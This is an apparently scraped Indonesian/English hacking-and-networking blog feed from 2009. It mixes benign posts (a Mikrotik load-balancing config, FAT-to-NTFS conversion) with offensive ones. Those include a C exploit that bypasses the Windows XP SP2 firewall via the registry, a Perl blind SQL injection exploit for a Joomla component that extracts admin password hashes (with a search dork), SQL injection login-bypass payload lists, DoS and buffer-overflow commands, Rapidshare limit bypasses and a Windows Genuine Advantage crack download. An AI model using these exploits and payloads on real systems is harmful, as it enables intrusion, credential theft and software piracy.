font-family: verdana;"><span style="font-size:85%;">The DI-LB604 Load Balancing Router features dual WAN ports, four LAN ports and firewall protection providing consistent network uptime and reliable Ethernet connection.</span></h4>--<br /><br /><span style="font-family: verdana;font-size:85%;" >Description</span><span style="font-family: verdana;font-size:85%;" ><br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://images.dlink.com/new/products/DFL-800/DFL-800_right.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 329px; height: 251px;" src="http://images.dlink.com/new/products/DFL-800/DFL-800_right.png" alt="" border="0" /></a><span style="font-family:verdana;">DFL-800</span><br /><span style="font-family: verdana;font-size:85%;" >This easy-to-deploy Desktop VPN Firewall solution is designed for small-to-medium sized businesses and is readily integrated into established networks.<br /><br />Saat menggunakannya lebih nyaman untuk koneksi dibawah 50user.<br /><br />mungkin untuk Perkantoran dengan load tinggi dan warnet dengan jumlah koneksi speedy 2bh. dapat direkomendasikan menggunakan alat ini.<br /><br /><br />Thanks<br /><br />Yudhax<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-8576806609037913527?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com4tag:blogger.com,1999:blog-8559681578113508762.post-85508868059847788352009-10-05T01:17:00.000+07:002009-10-05T01:24:43.801+07:00Mikrotik Load Balancing<br /><br />Setting Mikrotik ini Terinspirasi dari blog mas Dwi Nanto dan MikroTik Wiki, dan telah disesuaikan dgn Kondisi..<br /><br />modem 1<br />10.10.1.1<br /> |<br /> |<br />10.10.1.2 ——– MIkrotik Load Balancing — 192.168.0.1 — hub — Client<br />10.10.2.2<br /> |<br /> |<br />modem 2<br />10.10.2.1<br /><br /><br />Pc-Router Speknya<br />– Dual P-III - 800Mhz<br />– Memory 64Mb<br />– IDE Flash Disk 1 Gb<br /><br /><br /><br />Konfigurasinya<br /><br />1. Interface Konfigurasi<br /><br />/ interface ethernet<br />set Modem1 name=”Modem1" mtu=1500 \<br />mac-address=00:10:4B:0D:95:02 arp=enabled \<br />disable-running-check=yes auto-negotiation=yes \<br />full-duplex=yes cable-settings=default \<br />speed=100Mbps comment=”" disabled=no<br /><br />set Lan name=”Lan” mtu=1500 \<br />mac-address=00:0D:88:B2:7D:50 arp=enabled \<br />disable-running-check=yes auto-negotiation=yes \<br />full-duplex=yes cable-settings=default \<br />speed=100Mbps comment=”" disabled=no<br /><br />set Modem2 name=”Modem2? mtu=1500 \<br />mac-address=00:13:46:2C:DE:13 arp=enabled \<br />disable-running-check=yes auto-negotiation=yes \<br />full-duplex=yes cable-settings=default \<br />speed=100Mbps comment=”" disabled=no<br /><br /><br />2. Ip Address Konfigurasi<br /><br />/ ip address<br />add address=192.168.0.1/24 network=192.168.0.0 \<br />broadcast=192.168.0.255 \<br />interface=Lan comment=”" disabled=no<br /><br />add address=10.10.1.2/24 network=10.10.1.0 \<br />broadcast=10.10.1.255 \<br />interface=Modem1 comment=”" disabled=no<br /><br />add address=10.10.2.2/24 network=10.10.2.0 \<br />broadcast=10.10.2.255 \<br />interface=Modem2 comment=”" disabled=no<br /><br /><br />3. Routing IP<br /><br />/ ip route<br />add dst-address=0.0.0.0/0 gateway=10.10.2.1 scope=255 \<br />target-scope=10 routing-mark=odd \<br />comment=”" disabled=no<br /><br />add dst-address=0.0.0.0/0 gateway=10.10.1.1 scope=255 \<br />target-scope=10 routing-mark=even \<br />comment=”" disabled=no<br /><br />add dst-address=0.0.0.0/0 gateway=10.10.1.1 scope=255 \<br />target-scope=10 comment=”" disabled=no<br /><br /><br />4. Mangle Marking Paket<br /><br />/ ip firewall mangle<br />add chain=prerouting in-interface=Lan \<br />connection-state=new nth=1,1,0 \<br />action=mark-connection new-connection-mark=odd \<br />passthrough=yes comment=”Load Balancing” disabled=no<br /><br />add chain=prerouting in-interface=Lan \<br />connection-mark=odd action=mark-routing \<br />new-routing-mark=odd passthrough=no \<br />comment=”" disabled=no<br /><br />add chain=prerouting in-interface=Lan \<br />connection-state=new nth=1,1,1 \<br />action=mark-connection new-connection-mark=even \<br />passthrough=yes comment=”" disabled=no<br /><br />add chain=prerouting in-interface=Lan \<br />connection-mark=even action=mark-routing \<br />new-routing-mark=even passthrough=no \<br />comment=”" disabled=no<br /><br />add chain=postrouting out-interface=Lan \<br />dst-address=192.168.0.2 action=mark-packet \<br />new-packet-mark=operator-down passthrough=no<br /><br /><br /><br />5. Buat rule nat-masquerade untuk network 192.168.0.0/24 [IP - Firewall - Nat]<br /><br />/ ip firewall nat<br />add chain=srcnat src-address=192.168.0.0/24 \<br />action=masquerade<br /><br />add chain=srcnat connection-mark=odd action=src-nat \<br />to-addresses=10.10.2.2 to-ports=0-65535<br /><br />add chain=srcnat connection-mark=even action=src-nat \<br />to-addresses=10.10.1.2 to-ports=0-65535<br /><br /><br />6. Setting DNS<br />/ ip dns set<br />primary-dns=202.134.1.10 secondary-dns=202.134.0.155 \<br />allow-remote-requests=yes cache-size=4096KiB \<br />cache-max-ttl=1w cache-used=90KiB<br /><br />Label: Mikrotik<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-8550886805984778835?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com2tag:blogger.com,1999:blog-8559681578113508762.post-1244299070904157102009-02-27T11:23:00.001+07:002009-02-27T11:26:46.340+07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_-_ze5jbhUuc/SadrAICOTwI/AAAAAAAAAIU/Th11H6c4Rjw/s1600-h/hackBLACKDAY-K.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 250px; height: 375px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SadrAICOTwI/AAAAAAAAAIU/Th11H6c4Rjw/s400/hackBLACKDAY-K.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5307328335780400898" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-124429907090415710?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-48287902360452383092009-02-15T10:05:00.005+07:002009-02-15T10:11:13.283+07:00<p></p><p>1) Yang kita butuhkan IP Address and Command Prompt .<br /></p>2) Open Notepad and tulis dibawah ini .....!<br /><br /><em>@echo off<br />:A<br />Cls<br />echo MESSENGER<br />set /p n=User:<br />set /p m=Message:<br />net send %n% %m%<br />Pause<br />Goto A</em><br /><br />3) Now save this as "<strong>Messenger.Bat</strong>".<br /><br />4) Open Command Prompt.<br /><br />5) Drag this file (.bat file) over to Command Prompt and press Enter.<br /><br />6) You would then see something like this:<br /> <img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 136px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SZeHN0NLxKI/AAAAAAAAAHw/8EsslnQr_nY/s400/imessenger.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302855757674038434" /><br /><br />7) Now, type the IP Address of the computer you want to contact and press enter<br />You will see something like this:<br /> <img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 139px;" src="http://1.bp.blogspot.com/_-_ze5jbhUuc/SZeHYaMuK8I/AAAAAAAAAH4/i47Oz3NL-0o/s400/imessenger2.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302855939671337922" /><br /><br />8) Now all you need to do is type your message and press Enter.<br />Start Chatting.......!<br /><p><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 138px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SZeHelVkNtI/AAAAAAAAAIA/Kbwa6owIY4M/s400/imessenger3.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302856045740439250" /><br /></p><p>Thank kev</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-4828790236045238309?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-90496026128496222852009-02-15T04:09:00.003+07:002009-02-15T09:25:52.379+07:00<p>There are two hacks to beat Rapidshare download limits and waiting time.<br /><br /><strong>1) Rapidshare Hack (For Firefox Users) :-</strong><br />The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.<br />The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. <br />But most of the time, that advantage is available only to people with the programming skills to make the changes they want. <br /><br />That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.<br /><br />Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools. <br />It changes how Web pages look and act by altering the rendering process. <br /><br /><strong>http://greasemonkey.mozdev.org/</strong><br /><br />1) Install the Greasemonkey extension>><br />http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi<br />2) Restart Firefox <br />3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html<br />4) Right click on rapidshare.user.js and choose "Install User Script". <br />5) Run FireFox.<br />6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in. <br />Open it, wait a couple seconds for the install button becomes active. <br />7) Click on it to install this plug-in then CLOSE FIREFOX. <br />8) Run FireFox again. <br />From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'. <br />9) Open it. <br />10) Click the Tools Menu then click on Install User Script then click OK. <br />11) Close FireFox. <br /><br />The script will let you enjoy "no wait" and multiple file downloads......! <br /><br /><br />2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-<br />Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. <br />To get around this, you need to show the rapidshare server a different IP address.<br />Here are some methods for doing this-<br /><br />A] Short-Out the JavaScript:<br />1) Goto the page you want to download<br />2) Select FREE button<br />3) In the address bar put this- javascript:alert(c=0)<br />4) Click OK<br />5) Click OK to the pop-up box<br />6) Enter the captcha<br />7) Download Your File<br /><br />B] Request a new IP address from your ISP server:<br />Here’s how to do it in windows:<br />1) Click Start<br />2) Click run<br />3) In the run box type cmd.exe and click OK<br />4) When the command prompt opens type the following. ENTER after each new line.<br />ipconfig /flushdns<br />ipconfig /release<br />ipconfig /renew<br />exit<br />5) Erase your cookies in whatever browser you are using.<br />6) Try the rapidshare download again.<br />Frequently you will be assigned a new IP address when this happens. <br />Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. <br />If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.<br /><br />C] Use a proxy with SwitchProxy and Firefox:<br />1) Download and install Firefox<br />2) Download and install SwitchProxy<br />3) Google for free proxies<br />4) When you hit your download limit, clean your cookies and change your proxy<br /><br />D] You can use a bookmarklet to stop your wait times:<br />1) Open IE<br />2) Right Click On This Link<br />3) Select Add to Favorites<br />4) Select Yes to the warning that the bookmark may be unsafe.<br />5) Name it “RapidShare No Wait”<br />6) Click on the Links folder (if you want to display it in your IE toolbar)<br />7) Click OK<br />8) You may need to close and reopen IE to see it<br />9) Goto rapidshare and click the bookmarklet when you are forced to wait<br /><br /></p><p>Thanks kev</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-9049602612849622285?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-28759601386093323392009-02-15T04:07:00.000+07:002009-02-15T04:09:03.679+07:00To convert a FAT partition to NTFS, perform the following steps. <br /><br />1) Open 'Command Prompt'. <br /><br />2) At the command prompt, type the following- <br /><br />CONVERT [driveletter]: /FS:NTFS. <br /><br />'Convert.exe' will attempt to convert the partition to NTFS. <br /><br /><br />NOTE :- Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2875960138609332339?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-20333979202192085102009-02-15T04:03:00.001+07:002009-02-15T04:07:25.044+07:00Membuat Windows Legal sendiri ...<p>Windows Genuine Hack:- <br /></p><br />1) Download "Windows.Genuine.Advantage.Validation..rar" <br />2) Extract It. <br />3) Run "installer.bat" file. <br />4) Reboot. <br />5) Enjoy Your Validated Windows.<br /><p>http://rapidshare.com/files/115531401/Windows.Genuine.Advantage.Validation..rar<br /></p><p><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 222px;" src="http://1.bp.blogspot.com/_-_ze5jbhUuc/SZcyb55IFfI/AAAAAAAAAHg/TeCVcWliXig/s400/windows_genuine.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5302762541230331378" /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2033397920219208510?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-85867883225645675482009-02-15T03:59:00.001+07:002009-02-15T04:03:26.687+07:00How to run Firefox inside Firefox.?<br /><br />Yup you can run Firefox inside firefox just by typing following url.<br /><br />How about Opening Firefox inside Firefox which is again in another Firefox..?<br />Not bad huh? <br />And its really easy too just type in this url in Firefox's address bar and there you go! <br />Firefox inside Firefox!<br /><br />copy paste following url in a web browser (mozilla firefox).<br /><br />chrome://browser/content/browser.xul<br /><br /><br />Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-<br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/SZcxgNbpBEI/AAAAAAAAAHY/YIPwocEO-ZU/s400/firefox.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302761515683218498" /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-8586788322564567548?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-48567051582980780142009-02-15T03:58:00.000+07:002009-02-15T03:59:41.424+07:00There is a technique using which we can bypass windows-xp service pack-2 firewall.<br />This techniques is nothing but the vulnerability found in windows-xp sp2 firewall. <br />This is explained here in detail with exploit code. <br /><br />Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.<br /><br />Credit :-<br />The information has been provided by Mark Kica.<br />The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip <br /><br />Vulnerable Systems :-<br />* Microsoft Windows XP SP2<br /><br />Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.<br /><br />If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.<br /><br />Proof of Concept :-<br />Launch the regedit.exe program and access the keys found under the following path:<br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List<br /><br />Add an entry key such as this one:<br />Name: C:\chat.exe<br />Value: C:\chat.exe:*:Enabled:chat<br /><br />Exploit :- <br /><br />#include <stdio.h><br />#include <windows.h><br />#include <ezsocket.h><br />#include <conio.h><br />#include "Shlwapi.h" <br /><br />int main( int argc, char *argv [] )<br />{<br />char buffer[1024];<br />char filename[1024];<br /><br />HKEY hKey;<br />int i;<br /><br />GetModuleFileName(NULL, filename, 1024);<br /><br />strcpy(buffer, filename);<br />strcat(buffer, ":*:Enabled:");<br />strcat(buffer, "bugg");<br /><br />RegOpenKeyEx(<br /><br />HKEY_LOCAL_MACHINE,<br />"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",<br />0,<br />KEY_ALL_ACCESS,<br />&amp;hKey);<br /><br />RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));<br /><br />int temp, sockfd, new_fd, fd_size;<br />struct sockaddr_in remote_addr;<br /><br />fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");<br />fprintf(stdout, " This is not trojan \n");<br />fprintf(stdout, " Opened port is :2001 \n");<br />fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");<br />fprintf(stdout, "Dedicated to Katka H. from Levoca \n");<br /><br />sleep(3);<br /><br />if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)<br />return 0;<br /><br />for (; ; )<br />{<br />RegDeleteValue(hKey, filename);<br />fd_size = sizeof(struct sockaddr_in);<br /><br />if ((new_fd = accept(sockfd, (struct sockaddr *)&amp;remote_addr, &amp;fd_size)) == -1)<br />{<br />perror("accept");<br />continue;<br />}<br />temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);<br />fprintf(stdout, "Sended: Hello World\r\n");<br />temp = recv(new_fd, buffer, 1024, 0);<br />buffer[temp] = '\0';<br />fprintf(stdout, "Recieved: %s\r\n", buffer);<br />ezclose_socket(new_fd);<br />RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));<br /><br />if (!strcmp(buffer, "quit"))<br />break;<br />}<br /><br />ezsocket_exit();<br />return 0;<br />}<br /><br />/* EoF */<br /><p><br /></p><p>thanks kev</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-4856705158298078014?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-72431959069143675682009-02-15T03:55:00.000+07:002009-02-15T03:58:21.594+07:00<strong>Joomla Component n-forms Blind SQL Injection Exploit</strong><br /><br />#!/usr/bin/perl<br />use LWP::UserAgent;<br />use Getopt::Long;<br />if(!$ARGV[1])<br />{<br />print " \n";<br />print " #######################################################\n";<br />print " # Mambot Component n-forms Blind SQL Injection Exploit \n";<br />print " # Author:The Moorish :D \n";<br />print " #Greetz:Team-dz,His0k4,x.CJP.x,Kader11000,c02,piRAte DIgitAL\n";<br />print " # sites:www.h4cnc.com ,www.dz-secure.com #\n";<br />print " # Dork: inurl:com_n-forms #\n"; <br />print " # Usage: perl forms.pl host path <options> #\n";<br />print " # Example: perl forms.pl www.host.com /path/ -f 10 #\n";<br />print " # #\n";<br />print " # Options: #\n";<br />print " # -s Valid form id #\n";<br />print " # Note: #\n";<br />print " # You can change the match string if you need that #\n";<br />print " #########################################################\n";<br />exit;<br />}<br /><br />my $host = $ARGV[0];<br />my $path = $ARGV[1];<br />my $userid = 1;<br />my $fid = $ARGV[2];<br />my %options = ();<br />GetOptions(\%options, "u=i", "p=s", "f=i");<br />print "[~] Exploiting...\n";<br />if($options{"u"})<br />{<br />$userid = $options{"u"};<br />}<br />if($options{"f"})<br />{<br />$fid = $options{"f"};<br />}<br />syswrite(STDOUT, "[~] MD5-Hash: ", 14);<br />for(my $i = 1; $i <= 32; $i++)<br />{<br />my $f = 0;<br />my $h = 48;<br />while(!$f &amp;&amp; $h <= 57)<br />{<br />if(istrue2($host, $path, $userid, $fid, $i, $h))<br />{<br />$f = 1;<br />syswrite(STDOUT, chr($h), 1);<br />}<br />$h++;<br />}<br />if(!$f)<br />{<br />$h = 97;<br />while(!$f &amp;&amp; $h <= 122)<br />{<br />if(istrue2($host, $path, $userid, $fid, $i, $h))<br />{<br />$f = 1;<br />syswrite(STDOUT, chr($h), 1);<br />}<br />$h++;<br />}<br />}<br />}<br />print "\n[~] Exploiting done\n";<br />sub istrue2<br />{<br />my $host = shift;<br />my $path = shift;<br />my $uid = shift;<br />my $fid = shift;<br />my $i = shift;<br />my $h = shift;<br /><br />my $ua = LWP::UserAgent->new;<br />my $query = "http://".$host.$path."index.php?<br />option=com_n-forms&amp;form_id=".$fid." and ascii<br />(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1 )<br />,".$i.",1))=".$h."";<br /><br />if($options{"p"})<br />{<br />$ua->proxy('http', "http://".$options{"p"});<br />}<br /><br />my $resp = $ua->get($query);<br />my $content = $resp->content;<br />my $regexp = "nfields";<br /><br />if($content =~ /$regexp/)<br />{<br />return 1;<br />}<br />else<br />{<br />return 0;<br />}<br />}<br /><br /># milw0rm.com [2008-07-12]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7243195906914367568?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-22476330161582282342009-02-15T03:52:00.002+07:002009-02-15T03:55:05.539+07:00A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it's users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:-<br /><strong><br />1) Ping Of Death :- </strong>The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).<br />example:- c:/>ping -l 65540 hostname<br />Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.<br /><br />2) Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:<br />* packet 1 will carry bytes 1-1000.<br />* packet 2 will carry bytes 1001-2000.<br />* packet 3 will carry bytes 2001-3000.<br />In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.<br />(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)<br />When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.<br />Old Linux systems, Windows NT/95 are vulnerable.<br /><br />3) SYN - Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems' memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.<br /><strong><br />4) Land Attack :-</strong> A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.<br /><br />5) Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.<br /><p>Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.</p><p><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 349px; height: 240px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/SZcvZ4aOkAI/AAAAAAAAAHQ/jsV0vs3Yd7A/s400/smurf.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302759207937675266" /></p><p><strong>6) UDP - Flood Attack :- </strong>Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.</p><p>Thanks kev</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2247633016158228234?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-33024353858893933902009-02-15T03:51:00.000+07:002009-02-15T03:52:37.610+07:00SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.<br /><br />What is Required?<br />1) Any Web Browser<br />2) Some Basic SQL (Structured Query Language) Queries such as 'SELECT', 'INSERT', 'UPDATE', 'DELETE', etc. along with their attributes (i.e Syntax).<br /><br />What you should look for?<br />Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:<br /><br /><FORM action=login.aspx method=post><br /><input type=hidden name=user value=xyz><br /></FORM><br /><br />Everything between the <FORM> and </FORM> tags have potential parameters that might be useful.<br /><br />OR<br /><br />You should look for pages like ASP, ASPX, JSP, CGI, or PHP. <br />Try to look especially for URL that takes parameters, like:<br />http://example.com/login.asp?id=10<br /><br /><br />Is it Vulnerable?<br />Start with a single quote trick. Input something like:<br />hi' or 1=1--<br />Into login, or password, or even in the URL. Example:<br />Login: hi' or 1=1--<br />Pass: hi' or 1=1--<br />http://example.com/login.asp?id=hi' or 1=1--<br /><br />You can do this with a hidden field, just view the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly.<br />Example:<br /><FORM action=http://example.com/login.asp method=post><br /><input type=hidden name=abc value="hi' or 1=1--"><br /></FORM><br /><br />If luck is on your side, you will get login without any login name or password.<br /><br /><br />But why ' or 1=1-- ?<br />Take an asp page that will link you to another page with the following URL:<br />http://example.com/search.asp?category=sports<br />In this URL 'category' is the variable name and 'sports' is it's value.<br />Here this request fires following query on the database in background.<br />SELECT * FROM search WHERE category='sports'<br />Where 'search' is the name of table which is already present in some database.<br />So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.<br /><br />Now, assume that we change the URL into something like this:<br />http://example.com/search.asp?category=sports' or 1=1--<br />Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:<br />SELECT * FROM search WHERE category='sports' or 1=1--'<br />The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not. <br />A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote ('). <br />Sometimes, it may be possible to replace double dash with single hash "#".<br /><br />However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try<br />' or 'a'='a<br />It should return the same result.<br />Depending on the actual SQL query, you may have to try some of these possibilities:<br /><br />' or 1=1--<br />" or 1=1--<br />or 1=1--<br />' or 'a'='a<br />" or "a"="a<br />') or ('a'='a<br />'or''='<br /><br />Countermeasures ?<br />Filter out character like ' " - / \ ; NULL, etc. in all strings from:<br />* Input from users<br />* Parameters from URL<br />* Values from cookie<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3302435385889393390?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-69337204703893704902009-02-15T03:47:00.001+07:002009-02-15T03:51:26.104+07:00<strong>Input Validation Attacks</strong> are where an attacker intentionally sends unusual input in the hopes of confusing the application. <br />The most common input validation attacks are as follows- <br /> <br /><strong>1) Buffer Overflow :- </strong>Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions. <br />To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack. <br />Here’s the buffer test, calling on Perl from the command line: <br />$ echo –e “GET /login.php?user=\ <br />> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \ <br />nc –vv website 80 <br />This sends a string of 500 “a” characters for the user value to the login.php file. <br />Buffer overflow can be tested by sending repeated requests to the application and recording the server's response. <br /> <br /><strong>2) Canonicalization :- </strong>These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following- <br />/menu.asp?dimlDisplayer=menu.asp <br />/webacc?User.asp=login.htt <br />/SWEditServlet?station_path=Z&amp;publication_id=2043&amp;template=login.tem <br />/Getfile.asp?/scripts/Client/login.js <br />/includes/printable.asp?Link=customers/overview.htm <br /> <br /><strong>3) Cross-site Scripting (XSS) :-</strong> Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in 